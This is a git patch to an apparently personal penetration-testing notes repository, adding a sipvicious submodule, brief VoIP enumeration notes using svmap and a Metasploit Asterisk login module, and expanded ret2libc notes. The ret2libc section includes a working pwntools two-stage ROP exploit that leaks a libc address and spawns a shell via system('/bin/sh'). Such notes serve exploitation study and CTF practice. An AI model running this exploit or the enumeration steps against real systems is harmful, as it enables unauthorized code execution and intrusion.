From d17d9c6b5cc0ec3ca41011bce1f4bf11cde72f19 Mon Sep 17 00:00:00 2001 From: whx Date: Thu, 27 Jan 2022 00:43:24 +0100 Subject: [PATCH] bump --- .gitmodules | 3 ++ exploit/binaries/ret2libc.md | 73 +++++++++++++++++++++++++++++++- telecommunications/sipvicious | 1 + telecommunications/sipvicious.md | 7 +++ 4 files changed, 83 insertions(+), 1 deletion(-) create mode 160000 telecommunications/sipvicious create mode 100644 telecommunications/sipvicious.md diff --git a/.gitmodules b/.gitmodules index 8f50a98..3791fbb 100644 --- a/.gitmodules +++ b/.gitmodules @@ -103,3 +103,6 @@ [submodule "exploit/windows/CrackMapExec"] path = exploit/windows/CrackMapExec url = https://github.com/byt3bl33d3r/CrackMapExec.git +[submodule "telecommunications/sipvicious"] + path = telecommunications/sipvicious + url = https://github.com/EnableSecurity/sipvicious.git diff --git a/exploit/binaries/ret2libc.md b/exploit/binaries/ret2libc.md index caf40c8..912b5d9 100644 --- a/exploit/binaries/ret2libc.md +++ b/exploit/binaries/ret2libc.md @@ -1,8 +1,23 @@ # Ret2libc +* Check binary via + * `checksec`, PIE shows start address, RELRO shows permissions of r/w to got + * `file` +* Libc is affected by ASLR state of the machine, check via `cat /proc/sys/kernel/randomize_va_space` + * Off = 0 + * Partial = 1 + * Full = 2 +* `got` contains dynamically loaded functions +* `plt` contains used loaded dynamical functions -## Finding offsets +## Finding something to execute +* Interesting stuff to call from inside libc + * `/bin/sh` + * `system` +## libc -- Finding Offsets + +### Manually * On target find `sh` address inside libc ```sh strings -a -t x /lib32/libc.so.6 | grep /bin/sh 
@@ -11,3 +26,59 @@ strings -a -t x /lib32/libc.so.6 | grep /bin/sh
 ```sh
 readelf -s /lib32/libc.so.6 | grep system
 ```
+
+### Measure the Buffer
+* With gef
+ * `create pattern`
+ * `run`
+ * Use pattern
+ * `pattern search $`
+
+## ROP -- Creating a Chain
+
+* Creating a ROP chain to execute the `/bin/sh` with parameters
+* Check
+ * Architecture
+ * Calling convention
+
+## Usage
+* Create context
+```python
+#!/usr/bin/env python3
+
+from pwn import *
+
+context.binary = binary = ''
+elf = ELF(binary)
+rop = ROP(elf)
+libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
+p = process()
+
+# ROP I, needed when ASL is enabled
+payload = b'A' * 18
+payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])
+payload += p64(elf.got.gets)
+payload += p64(elf.plt.puts)
+payload += p64(elf.symbols.main)
+
+p.recvline()
+p.sendline(payload)
+p.recvline()
+leak = u64(p.recvline().strip().ljust(8,b'\0')) # ljust, pre padding for alignement
+p.recvline()
+
+log.info(f"gets: {hex(leak)}")
+libc.address = leak - libc.symbols.gets
+log.info(f"libc address: {hex(libc.address)}") # start address should be aligned
+
+# ROP II
+payload = b'A' * 18
+payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])
+payload += p64(next(libc.search(b'/bin/sh')))
+payload += p64(rop.find_gadget(['ret'])[0])
+payload += p64(libc.symbols.system)
+
+p.sendline(payload)
+p.recvline()
+p.interactive()
+```
diff --git a/telecommunications/sipvicious b/telecommunications/sipvicious
new file mode 160000
index 0000000..db051d8
--- /dev/null
+++ b/telecommunications/sipvicious
@@ -0,0 +1 @@
+Subproject commit db051d8845a11ae458acc79cf5104cef28dc3f25
diff --git a/telecommunications/sipvicious.md b/telecommunications/sipvicious.md
new file mode 100644
index 0000000..bca3aa5
--- /dev/null
+++ b/telecommunications/sipvicious.md
@@ -0,0 +1,7 @@
+# Sipvicious
+
+* [Enable Security](https://github.com/EnableSecurity/sipvicious.git)
+
+# Enumeration
+* Check which PBX is used via `svmap $TARGET_IP`
+* Use `msf6 auxiliary(voip/asterisk_login)`